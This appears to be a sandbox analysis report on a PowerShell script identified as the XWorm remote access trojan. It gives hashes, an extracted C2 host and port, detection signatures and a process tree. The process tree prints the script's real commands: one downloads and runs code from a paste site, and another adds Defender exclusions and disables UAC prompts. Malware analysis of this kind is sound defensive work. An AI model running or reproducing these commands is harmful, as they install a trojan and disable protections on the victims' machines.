Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

run.ps1

windows7-x64

3

run.ps1

windows10-2004-x64

10

Analysis

  • max time kernel
    87s
  • max time network
    88s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/03/2025, 22:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    run.ps1

  • Size

    50B

  • MD5

    a842bb38fa14cb90a9a3169e0da00d0e

  • SHA1

    d8541bd2cfb386294b24c4c4e68eba269cbffcd9

  • SHA256

    79a0a92cd82c5a3b0d3e8c72d1acbec46ac9677797cf751584ef5fb838e5b0ec

  • SHA512

    a068a2d4945f38fdd4165089679593b60bc594bb993c0c61f3c08b6b9496f695d847f7f970793a46eaf33ffe80fd93cc3dbee889f471368b6c8bac36a0df9048

Score
10/10
xwormdefense_evasionexecutionrattrojan

Malware Config

Extracted

Family

xworm

C2

running-boating.gl.at.ply.gg:49261

Mutex

nTuejMBVrsDVuX5I

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
    defense_evasiontrojan
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3228
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "irm https://paste.ee/d/xkhQqMbj | iex"
      2⤵
      • Blocklisted process makes network request
      • Downloads MZ/PE file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4680
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath $Env:ProgramData, $Env:Temp, $Env:HomeDrive; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0 -Type DWord
        3⤵
        • UAC bypass
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3116
      • C:\ProgramData\SVrB5SO0.exe
        "C:\ProgramData\SVrB5SO0.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2812

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\SVrB5SO0.exe
    Filesize

    30KB

    MD5

    e5090d029c342cc6d003a8a6c497806e

    SHA1

    952d9ab187d626b4f0e47ac161050d532030e609

    SHA256

    fb667a12c1e9af4d5cc7ecc0e6475353953ea3255378cdb02be259f369b7c71b

    SHA512

    60d2f1b1128eea8be26e159f08413270ae1a660e78fd7e65c783dc3e8dece8d98286a06815578196bb1fcd541c067d4a144f1228f0da254bc9985fa24ad7c2a5

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    6cf293cb4d80be23433eecf74ddb5503

    SHA1

    24fe4752df102c2ef492954d6b046cb5512ad408

    SHA256

    b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

    SHA512

    0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    f5076bd51ad9341494ff72f200b7b390

    SHA1

    ee124a46aeddd94baa48616d5298945465ad9350

    SHA256

    165150c444b6f877540da64662e07acbdedf5a879566cffb77502de3dc02a0a4

    SHA512

    e23e63762add5d1ec1fc2537cb00e3c7ef0c49366805d50259bb3316ddd4a47c225131f54b6c6870b987f7866c51a042b635e08f0b67a6eb5d83bc4baab1bcd0

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    64B

    MD5

    1a11402783a8686e08f8fa987dd07bca

    SHA1

    580df3865059f4e2d8be10644590317336d146ce

    SHA256

    9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

    SHA512

    5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ajwte1pq.y1d.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/2812-52-0x0000000000840000-0x000000000084E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/3228-12-0x00007FF8DA960000-0x00007FF8DB421000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3228-39-0x00007FF8DA960000-0x00007FF8DB421000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3228-0-0x00007FF8DA963000-0x00007FF8DA965000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3228-11-0x00007FF8DA960000-0x00007FF8DB421000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3228-6-0x000002587CBD0000-0x000002587CBF2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3228-59-0x00007FF8DA960000-0x00007FF8DB421000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4680-24-0x00007FF8DA960000-0x00007FF8DB421000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4680-25-0x0000023FD7AE0000-0x0000023FD7CA2000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/4680-40-0x00007FF8DA960000-0x00007FF8DB421000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4680-23-0x00007FF8DA960000-0x00007FF8DB421000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4680-19-0x00007FF8DA960000-0x00007FF8DB421000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4680-56-0x00007FF8DA960000-0x00007FF8DB421000-memory.dmp

    Filesize

    10.8MB

    Download